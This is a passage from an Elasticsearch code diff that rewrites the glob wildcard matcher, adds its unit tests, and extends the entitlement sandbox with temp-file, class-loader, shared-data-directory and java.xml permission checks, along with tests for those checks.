// The suffix would start before the current position. That means it's not a match + // e.g. "abc" is not a match for "ab*bc" even though "abc" does end with "bc" + return false; + } + return str.regionMatches(strSuffixStart, pattern, patternIndex, len); + } else { + // There is another star, with a literal in between the current position and that '*' + // That is, we have "*literal*" + // We want the first '*' to consume everything up until the first occurrence of "literal" in the input string + int match = str.indexOf(pattern.substring(patternIndex, nextStar), strIndex); + if (match == -1) { + // If "literal" isn't there, then the match fails. + return false; } - partIndex = str.indexOf(part, partIndex + 1); + // Move both index (pointer) values to the end of the literal + strIndex = match + (nextStar - patternIndex); + patternIndex = nextStar; } - return false; } - return (str.length() >= firstIndex - && pattern.substring(0, firstIndex).equals(str.substring(0, firstIndex)) - && globMatch(pattern.substring(firstIndex), str.substring(firstIndex))); + + // We might have trailing '*'s in the pattern after completing a literal match at the end of the input string + // e.g. a glob of "el*ic*" matching "elastic" - we need to consume that last '*' without it matching anything + while (patternIndex < pattern.length() && pattern.charAt(patternIndex) == '*') { + patternIndex++; + } + + // The match is successful only if we have consumed the entire pattern. + return patternIndex == pattern.length(); } } diff --git a/libs/core/src/test/java/org/elasticsearch/core/GlobTests.java b/libs/core/src/test/java/org/elasticsearch/core/GlobTests.java new file mode 100644 index 0000000000000..12dbb3f0313b8 --- /dev/null +++ b/libs/core/src/test/java/org/elasticsearch/core/GlobTests.java @@ -0,0 +1,206 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.core; + +import org.elasticsearch.test.ESTestCase; + +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.is; + +public class GlobTests extends ESTestCase { + + public void testMatchNull() { + assertThat(Glob.globMatch(null, null), is(false)); + assertThat(Glob.globMatch(randomAlphaOfLengthBetween(1, 10), null), is(false)); + assertThat(Glob.globMatch(null, randomAlphaOfLengthBetween(1, 10)), is(false)); + } + + public void testMatchLiteral() { + assertMatch("", ""); + var str = randomAlphaOfLengthBetween(1, 12); + assertMatch(str, str); + + str = randomAlphanumericOfLength(randomIntBetween(1, 12)); + assertMatch(str, str); + + str = randomAsciiStringNoAsterisks(randomIntBetween(1, 24)); + assertMatch(str, str); + } + + public void testSingleAsterisk() { + assertMatch("*", ""); + assertMatch("*", randomAlphaOfLengthBetween(1, 12)); + assertMatch("*", randomAlphanumericOfLength(randomIntBetween(1, 12))); + assertMatch("*", randomAsciiString(randomIntBetween(1, 24), ch -> ch >= ' ' && ch <= '~')); + assertMatch("*", "*".repeat(randomIntBetween(1, 5))); + } + + public void testMultipleConsecutiveAsterisk() { + var pattern = "*".repeat(randomIntBetween(2, 5)); + + assertMatch(pattern, ""); + assertMatch(pattern, randomAlphaOfLengthBetween(1, 12)); + assertMatch(pattern, randomAlphanumericOfLength(randomIntBetween(1, 12))); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 24))); + assertMatch(pattern, "*".repeat(randomIntBetween(1, 5))); + } + + public void testPrefixMatch() { + assertMatch("123*", "123"); + assertMatch("123*", "123abc"); + assertMatch("123*", "123123123"); + assertNonMatch("123*", "12"); + assertNonMatch("123*", "124"); + assertNonMatch("123*", "23"); + assertNonMatch("123*", "23x"); + assertNonMatch("123*", "x23"); + assertNonMatch("123*", "12*"); + assertNonMatch("123*", "12-3"); + assertNonMatch("123*", "1.2.3"); + assertNonMatch("123*", "abc123"); + assertNonMatch("123*", "abc123def"); + + var prefix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = prefix + "*"; + assertMatch(pattern, prefix); + assertMatch(pattern, prefix + randomAsciiString(randomIntBetween(1, 30))); + assertNonMatch( + pattern, + randomValueOtherThanMany(s -> s.charAt(0) == prefix.charAt(0), () -> randomAsciiString(randomIntBetween(1, 30))) + prefix + ); + assertNonMatch(pattern, prefix.substring(0, prefix.length() - 1)); + assertNonMatch(pattern, prefix.substring(1)); + } + + public void testSuffixMatch() { + assertMatch("*123", "123"); + assertMatch("*123", "abc123"); + assertMatch("*123", "123123123"); + assertNonMatch("*123", "12"); + assertNonMatch("*123", "x12"); + assertNonMatch("*123", "23"); + assertNonMatch("*123", "x23"); + assertNonMatch("*123", "12*"); + assertNonMatch("*123", "1.2.3"); + assertNonMatch("*123", "123abc"); + assertNonMatch("*123", "abc123def"); + + var suffix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = "*" + suffix; + assertMatch(pattern, suffix); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 30)) + suffix); + assertNonMatch( + pattern, + randomValueOtherThanMany(str -> str.endsWith(suffix), () -> suffix + "#" + randomAsciiString(randomIntBetween(1, 30))) + ); + assertNonMatch(pattern, suffix.substring(0, suffix.length() - 1)); + assertNonMatch(pattern, suffix.substring(1)); + } + + public void testInfixStringMatch() { + assertMatch("*123*", "abc123def"); + assertMatch("*123*", "abc123"); + assertMatch("*123*", "123def"); + assertMatch("*123*", "123"); + assertMatch("*123*", "123123123"); + assertMatch("*123*", "1.12.123.1234"); + assertNonMatch("*123*", "12"); + assertNonMatch("*123*", "23"); + assertNonMatch("*123*", "x23"); + assertNonMatch("*123*", "12*"); + assertNonMatch("*123*", "1.2.3"); + + var infix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = "*" + infix + "*"; + assertMatch(pattern, infix); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 30)) + infix + randomAsciiString(randomIntBetween(1, 30))); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 30)) + infix); + assertMatch(pattern, infix + randomAsciiString(randomIntBetween(1, 30))); + assertNonMatch(pattern, infix.substring(0, infix.length() - 1)); + assertNonMatch(pattern, infix.substring(1)); + } + + public void testInfixAsteriskMatch() { + assertMatch("abc*xyz", "abcxyz"); + assertMatch("abc*xyz", "abc#xyz"); + assertMatch("abc*xyz", "abc*xyz"); + assertMatch("abc*xyz", "abcdefghijklmnopqrstuvwxyz"); + assertNonMatch("abc*xyz", "ABC.xyz"); + assertNonMatch("abc*xyz", "RabcSxyzT"); + assertNonMatch("abc*xyz", "RabcSxyz"); + assertNonMatch("abc*xyz", "abcSxyzT"); + + assertMatch("123*321", "123321"); + assertMatch("123*321", "12345678987654321"); + assertNonMatch("123*321", "12321"); + + var prefix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var suffix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = prefix + "*" + suffix; + assertMatch(pattern, prefix + suffix); + assertMatch(pattern, prefix + randomAsciiString(randomIntBetween(1, 30)) + suffix); + assertNonMatch(pattern, prefix.substring(0, prefix.length() - 1) + suffix); + assertNonMatch(pattern, prefix + suffix.substring(1)); + } + + public void testLiteralSubstringMatching() { + assertMatch("start*middle*end", "startmiddleend"); + assertMatch("start*middle*end", "start.middle.end"); + assertMatch("start*middle*end", "start.middlX.middle.end"); + assertMatch("start*middle*end", "start.middlmiddle.end"); + assertMatch("start*middle*end", "start.middle.eend"); + assertMatch("start*middle*end", "start.middle.enend"); + assertMatch("start*middle*end", "start.middle.endend"); + + assertNonMatch("start*middle*end", "startmiddlend"); + assertNonMatch("start*middle*end", "start.end"); + assertNonMatch("start*middle*end", "start+MIDDLE+end"); + assertNonMatch("start*middle*end", "start+mid+dle+end"); + assertNonMatch("start*middle*end", "start+mid+middle+en"); + } + + private static void assertMatch(String pattern, String str) { + assertThat("Expect [" + str + "] to match '" + pattern + "'", Glob.globMatch(pattern, str), is(true)); + } + + private static void assertNonMatch(String pattern, String str) { + assertThat("Expect [" + str + "] to not match '" + pattern + "'", Glob.globMatch(pattern, str), is(false)); + } + + @FunctionalInterface + interface CharPredicate { + boolean test(char c); + } + + private String randomAsciiString(int length) { + return randomAsciiString(length, ch -> ch >= ' ' && ch <= '~'); + } + + private String randomAsciiStringNoAsterisks(final int length) { + return randomAsciiString(length, ch -> ch >= ' ' && ch <= '~' && ch != '*'); + } + + private String randomAsciiString(int length, CharPredicate validCharacters) { + StringBuilder str = new StringBuilder(length); + nextChar: for (int i = 0; i < length; i++) { + for (int attempts = 0; attempts < 200; attempts++) { + char ch = (char) randomIntBetween(0x1, 0x7f); + if (validCharacters.test(ch)) { + str.append(ch); + continue nextChar; + } + } + throw new IllegalStateException("Cannot find valid character for string"); + } + assertThat(str.length(), equalTo(length)); + return str.toString(); + } + +} diff --git a/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java b/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java index 1fd429e6f9fd6..6457eacb14e9f 100644 --- a/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java +++ b/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java @@ -136,6 +136,10 @@ public interface EntitlementChecker { void check$java_net_URLClassLoader$(Class callerClass, String name, URL[] urls, ClassLoader parent, URLStreamHandlerFactory factory); + void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls, ClassLoader parent); + + void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls); + void check$java_security_SecureClassLoader$(Class callerClass); void check$java_security_SecureClassLoader$(Class callerClass, ClassLoader parent); @@ -771,6 +775,8 @@ public interface EntitlementChecker { void check$java_io_File$createNewFile(Class callerClass, File file); + void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix); + void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix, File directory); void check$java_io_File$delete(Class callerClass, File file); diff --git a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java index e80b0a8580b5e..3ded3e3ac8924 100644 --- a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java +++ b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java @@ -13,6 +13,7 @@ import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.entitlement.qa.entitled.EntitledActions; import org.elasticsearch.env.Environment; +import org.xml.sax.helpers.DefaultHandler; import java.io.File; import java.io.FileDescriptor; @@ -39,6 +40,7 @@ import java.util.zip.ZipFile; import javax.imageio.stream.FileImageInputStream; +import javax.xml.parsers.SAXParserFactory; import static java.nio.charset.Charset.defaultCharset; import static java.nio.file.StandardOpenOption.CREATE; @@ -97,6 +99,17 @@ static void fileCreateTempFile() throws IOException { File.createTempFile("prefix", "suffix", readWriteDir().toFile()); } + @EntitlementTest(expectedAccess = ALWAYS_ALLOWED) + static void fileCreateTempFileSystemTempDirectory() throws IOException { + File.createTempFile("prefix", "suffix"); + } + + @EntitlementTest(expectedAccess = ALWAYS_ALLOWED) + static void fileCreateTempFileNullDirectory() throws IOException { + // null directory = system temp directory + File.createTempFile("prefix", "suffix", null); + } + @EntitlementTest(expectedAccess = PLUGINS) static void fileDelete() throws IOException { var toDelete = EntitledActions.createTempFileForWrite(); @@ -599,5 +612,12 @@ static void javaDesktopFileAccess() throws Exception { new FileImageInputStream(file.toFile()).close(); } + @EntitlementTest(expectedAccess = ALWAYS_DENIED) + static void javaXmlFileRequest() throws Exception { + // java.xml is part of the jdk, but not a system module. this checks it can't access files + var saxParser = SAXParserFactory.newInstance().newSAXParser(); + saxParser.parse(readFile().toFile(), new DefaultHandler()); + } + private FileCheckActions() {} } diff --git a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java index 29e4ffccce0b3..78ffb93a4b9e9 100644 --- a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java +++ b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java @@ -18,6 +18,9 @@ import java.util.Locale; import java.util.TimeZone; +import javax.xml.parsers.SAXParserFactory; + +import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.ALWAYS_ALLOWED; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.ALWAYS_DENIED; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.PLUGINS; @@ -69,6 +72,20 @@ static void createClassLoader() throws IOException { } } + @EntitlementTest(expectedAccess = PLUGINS) + static void createClassLoaderNewInstance1() throws IOException { + try (var classLoader = URLClassLoader.newInstance(new URL[0])) { + // intentionally empty, just let the loader close + } + } + + @EntitlementTest(expectedAccess = PLUGINS) + static void createClassLoaderNewInstance2() throws IOException { + try (var classLoader = URLClassLoader.newInstance(new URL[0], RestEntitlementsCheckAction.class.getClassLoader())) { + // intentionally empty, just let the loader close + } + } + @EntitlementTest(expectedAccess = ALWAYS_DENIED) static void createLogManager() { new java.util.logging.LogManager() { @@ -80,5 +97,12 @@ static void createLogManager() { Thread.setDefaultUncaughtExceptionHandler(Thread.getDefaultUncaughtExceptionHandler()); } + @EntitlementTest(expectedAccess = ALWAYS_ALLOWED) + static void useJavaXmlParser() { + // java.xml is part of the jdk, but not a system module. this checks it's actually usable + // as it needs to read classes from the jdk which is not generally allowed + SAXParserFactory.newInstance(); + } + private JvmActions() {} } diff --git a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java index 7b99aab0a19e4..af82a29c750e9 100644 --- a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java +++ b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java @@ -10,6 +10,7 @@ package org.elasticsearch.entitlement.qa.test; import org.elasticsearch.core.SuppressForbidden; +import org.xml.sax.helpers.DefaultHandler; import java.io.IOException; import java.net.DatagramPacket; @@ -46,6 +47,7 @@ import javax.net.ssl.HttpsURLConnection; import javax.net.ssl.SSLContext; +import javax.xml.parsers.SAXParserFactory; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.ALWAYS_DENIED; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.PLUGINS; @@ -434,5 +436,12 @@ static void receiveDatagramSocket() throws IOException { } } + @EntitlementTest(expectedAccess = ALWAYS_DENIED) + static void javaXmlNetworkRequest() throws Exception { + // java.xml is part of the jdk, but not a system module. this checks it can't access the network + var saxParser = SAXParserFactory.newInstance().newSAXParser(); + saxParser.parse("http://127.0.0.1/foo.json", new DefaultHandler()); + } + private NetworkAccessCheckActions() {} } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java index be9e8254f464c..7a38ff50a8d6d 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java @@ -46,6 +46,7 @@ public class EntitlementBootstrap { * @param scopeResolver a functor to map a Java Class to the component and module it belongs to. * @param settingResolver a functor to resolve a setting name pattern for one or more Elasticsearch settings. * @param dataDirs data directories for Elasticsearch + * @param sharedDataDir shared data directory for Elasticsearch (deprecated) * @param sharedRepoDirs shared repository directories for Elasticsearch * @param configDir the config directory for Elasticsearch * @param libDir the lib directory for Elasticsearch @@ -63,6 +64,7 @@ public static void bootstrap( Function, PolicyManager.PolicyScope> scopeResolver, Function> settingResolver, Path[] dataDirs, + Path sharedDataDir, Path[] sharedRepoDirs, Path configDir, Path libDir, @@ -82,6 +84,7 @@ public static void bootstrap( getUserHome(), configDir, dataDirs, + sharedDataDir, sharedRepoDirs, libDir, modulesDir, @@ -122,7 +125,7 @@ static void loadAgent(String agentPath, String entitlementInitializationClassNam vm.detach(); } } catch (AttachNotSupportedException | IOException | AgentLoadException | AgentInitializationException e) { - throw new IllegalStateException("Unable to attach entitlement agent", e); + throw new IllegalStateException("Unable to attach entitlement agent [" + agentPath + "]", e); } } @@ -161,7 +164,7 @@ private static PolicyManager createPolicyManager( PathLookup pathLookup, Policy serverPolicyPatch, Function, PolicyManager.PolicyScope> scopeResolver, - Map> pluginSourcePaths + Map> pluginSourcePathsResolver ) { FilesEntitlementsValidation.validate(pluginPolicies, pathLookup); @@ -170,7 +173,7 @@ private static PolicyManager createPolicyManager( HardcodedEntitlements.agentEntitlements(), pluginPolicies, scopeResolver, - pluginSourcePaths, + pluginSourcePathsResolver::get, pathLookup ); } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java index 7ac921e29174f..bdc4c92b404aa 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java @@ -21,6 +21,7 @@ import org.elasticsearch.entitlement.runtime.policy.entitlements.LoadNativeLibrariesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ManageThreadsEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.OutboundNetworkEntitlement; +import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadJdkImageEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadStoreAttributesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.SetHttpsConnectionPropertiesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.WriteSystemPropertiesEntitlement; @@ -37,6 +38,7 @@ import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.LOGS; import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.MODULES; import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.PLUGINS; +import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.SHARED_DATA; import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.SHARED_REPO; import static org.elasticsearch.entitlement.runtime.policy.Platform.LINUX; import static org.elasticsearch.entitlement.runtime.policy.entitlements.FilesEntitlement.Mode.READ; @@ -57,6 +59,7 @@ private static List createServerEntitlements(Path pidFile) { FilesEntitlement.FileData.ofBaseDirPath(LOGS, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(LIB, READ), FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(SHARED_REPO, READ_WRITE), // exclusive settings file FilesEntitlement.FileData.ofRelativePath(Path.of("operator/settings.json"), CONFIG, READ_WRITE).withExclusive(true), @@ -90,8 +93,9 @@ private static List createServerEntitlements(Path pidFile) { new CreateClassLoaderEntitlement(), new FilesEntitlement( List.of( - // TODO: what in es.base is accessing shared repo? + // necessary due to lack of delegation ES-12382 FilesEntitlement.FileData.ofBaseDirPath(SHARED_REPO, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) ) ) @@ -111,6 +115,21 @@ private static List createServerEntitlements(Path pidFile) { ) ), new Scope("java.desktop", List.of(new LoadNativeLibrariesEntitlement())), + new Scope( + "java.xml", + List.of( + new ReadJdkImageEntitlement(), + // java.xml does some reflective stuff that reads calling jars, so allow reading the codebases + // of any code in the system so that they can all use java.xml + new FilesEntitlement( + List.of( + FilesEntitlement.FileData.ofBaseDirPath(LIB, READ), + FilesEntitlement.FileData.ofBaseDirPath(MODULES, READ), + FilesEntitlement.FileData.ofBaseDirPath(PLUGINS, READ) + ) + ) + ) + ), new Scope("org.apache.httpcomponents.httpclient", List.of(new OutboundNetworkEntitlement())), new Scope( "org.apache.lucene.core", @@ -120,6 +139,7 @@ private static List createServerEntitlements(Path pidFile) { new FilesEntitlement( List.of( FilesEntitlement.FileData.ofBaseDirPath(CONFIG, READ), + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) ) ) @@ -128,7 +148,12 @@ private static List createServerEntitlements(Path pidFile) { new Scope( "org.apache.lucene.misc", List.of( - new FilesEntitlement(List.of(FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE))), + new FilesEntitlement( + List.of( + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) + ) + ), new ReadStoreAttributesEntitlement() ) ), @@ -143,7 +168,12 @@ private static List createServerEntitlements(Path pidFile) { "org.elasticsearch.nativeaccess", List.of( new LoadNativeLibrariesEntitlement(), - new FilesEntitlement(List.of(FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE))) + new FilesEntitlement( + List.of( + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) + ) + ) ) ) ); diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java index 041fc5db6d704..29d4a3f4d0337 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java @@ -194,6 +194,16 @@ public ElasticsearchEntitlementChecker(PolicyChecker policyChecker) { policyChecker.checkCreateClassLoader(callerClass); } + @Override + public void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls) { + policyChecker.checkCreateClassLoader(callerClass); + } + + @Override + public void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls, ClassLoader parent) { + policyChecker.checkCreateClassLoader(callerClass); + } + @Override public void check$java_security_SecureClassLoader$(Class callerClass) { policyChecker.checkCreateClassLoader(callerClass); @@ -1489,9 +1499,20 @@ public void checkSelectorProviderOpenSocketChannel(Class callerClass, Selecto policyChecker.checkFileWrite(callerClass, file); } + @Override + public void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix) { + policyChecker.checkCreateTempFile(callerClass); + } + @Override public void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix, File directory) { - policyChecker.checkFileWrite(callerClass, directory); + // A null value for the directory parameter means using the temp directory (java.io.tmpdir, + // aka org.elasticsearch.env.Environment#tmpDir, aka PathLookup#TEMP). + if (directory == null) { + policyChecker.checkCreateTempFile(callerClass); + } else { + policyChecker.checkFileWrite(callerClass, directory); + } } @Override diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java index 361d77ff83477..2febb301d1ab4 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java @@ -9,6 +9,8 @@ package org.elasticsearch.entitlement.runtime.policy; +import org.elasticsearch.core.PathUtils; + import java.nio.file.Path; import java.util.stream.Stream; @@ -16,10 +18,13 @@ * Resolves paths for known directories checked by entitlements. */ public interface PathLookup { + Class DEFAULT_FILESYSTEM_CLASS = PathUtils.getDefaultFileSystem().getClass(); + enum BaseDir { USER_HOME, CONFIG, DATA, + SHARED_DATA, SHARED_REPO, LIB, MODULES, @@ -37,4 +42,6 @@ enum BaseDir { * paths of the given {@code baseDir}. */ Stream resolveSettingPaths(BaseDir baseDir, String settingName); + + boolean isPathOnDefaultFilesystem(Path path); } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java index e3474250d43f0..d3be1d08ef989 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java @@ -25,6 +25,7 @@ public record PathLookupImpl( Path homeDir, Path configDir, Path[] dataDirs, + Path sharedDataDir, Path[] sharedRepoDirs, Path libDir, Path modulesDir, @@ -56,6 +57,7 @@ public Stream getBaseDirPaths(BaseDir baseDir) { return switch (baseDir) { case USER_HOME -> Stream.of(homeDir); case DATA -> Arrays.stream(dataDirs); + case SHARED_DATA -> Stream.ofNullable(sharedDataDir); case SHARED_REPO -> Arrays.stream(sharedRepoDirs); case CONFIG -> Stream.of(configDir); case LIB -> Stream.of(libDir); @@ -75,4 +77,9 @@ public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { .toList(); return getBaseDirPaths(baseDir).flatMap(path -> relativePaths.stream().map(path::resolve)); } + + @Override + public boolean isPathOnDefaultFilesystem(Path path) { + return path.getFileSystem().getClass() == DEFAULT_FILESYSTEM_CLASS; + } } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java index 5ea477c177740..e4dcd4758d544 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java @@ -9,7 +9,6 @@ package org.elasticsearch.entitlement.runtime.policy; -import org.elasticsearch.core.PathUtils; import org.elasticsearch.core.Strings; import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.entitlement.instrumentation.InstrumentationService; @@ -22,6 +21,7 @@ import org.elasticsearch.entitlement.runtime.policy.entitlements.LoadNativeLibrariesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ManageThreadsEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.OutboundNetworkEntitlement; +import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadJdkImageEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadStoreAttributesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.SetHttpsConnectionPropertiesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.WriteSystemPropertiesEntitlement; @@ -58,7 +58,7 @@ */ @SuppressForbidden(reason = "Explicitly checking APIs that are forbidden") public class PolicyCheckerImpl implements PolicyChecker { - static final Class DEFAULT_FILESYSTEM_CLASS = PathUtils.getDefaultFileSystem().getClass(); + protected final Set suppressFailureLogPackages; /** * Frames originating from this module are ignored in the permission logic. @@ -81,15 +81,14 @@ public PolicyCheckerImpl( this.pathLookup = pathLookup; } - private static boolean isPathOnDefaultFilesystem(Path path) { - var pathFileSystemClass = path.getFileSystem().getClass(); - if (path.getFileSystem().getClass() != DEFAULT_FILESYSTEM_CLASS) { + private boolean isPathOnDefaultFilesystem(Path path) { + if (pathLookup.isPathOnDefaultFilesystem(path) == false) { PolicyManager.generalLogger.trace( () -> Strings.format( "File entitlement trivially allowed: path [%s] is for a different FileSystem class [%s], default is [%s]", path.toString(), - pathFileSystemClass.getName(), - DEFAULT_FILESYSTEM_CLASS.getName() + path.getFileSystem().getClass().getName(), + PathLookup.DEFAULT_FILESYSTEM_CLASS.getName() ) ); return false; @@ -135,11 +134,11 @@ private void neverEntitled(Class callerClass, Supplier operationDescr Strings.format( "component [%s], module [%s], class [%s], operation [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, operationDescription.get() ), - callerClass, + requestingClass, entitlements ); } @@ -217,7 +216,7 @@ public void checkFileRead(Class callerClass, Path path) { @Override public void checkFileRead(Class callerClass, Path path, boolean followLinks) throws NoSuchFileException { - if (PolicyCheckerImpl.isPathOnDefaultFilesystem(path) == false) { + if (isPathOnDefaultFilesystem(path) == false) { return; } var requestingClass = requestingClass(callerClass); @@ -247,11 +246,11 @@ public void checkFileRead(Class callerClass, Path path, boolean followLinks) Strings.format( "component [%s], module [%s], class [%s], entitlement [file], operation [read], path [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, realPath == null ? path : Strings.format("%s -> %s", path, realPath) ), - callerClass, + requestingClass, entitlements ); } @@ -265,7 +264,7 @@ public void checkFileWrite(Class callerClass, File file) { @Override public void checkFileWrite(Class callerClass, Path path) { - if (PolicyCheckerImpl.isPathOnDefaultFilesystem(path) == false) { + if (isPathOnDefaultFilesystem(path) == false) { return; } var requestingClass = requestingClass(callerClass); @@ -279,11 +278,11 @@ public void checkFileWrite(Class callerClass, Path path) { Strings.format( "component [%s], module [%s], class [%s], entitlement [file], operation [write], path [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, path ), - callerClass, + requestingClass, entitlements 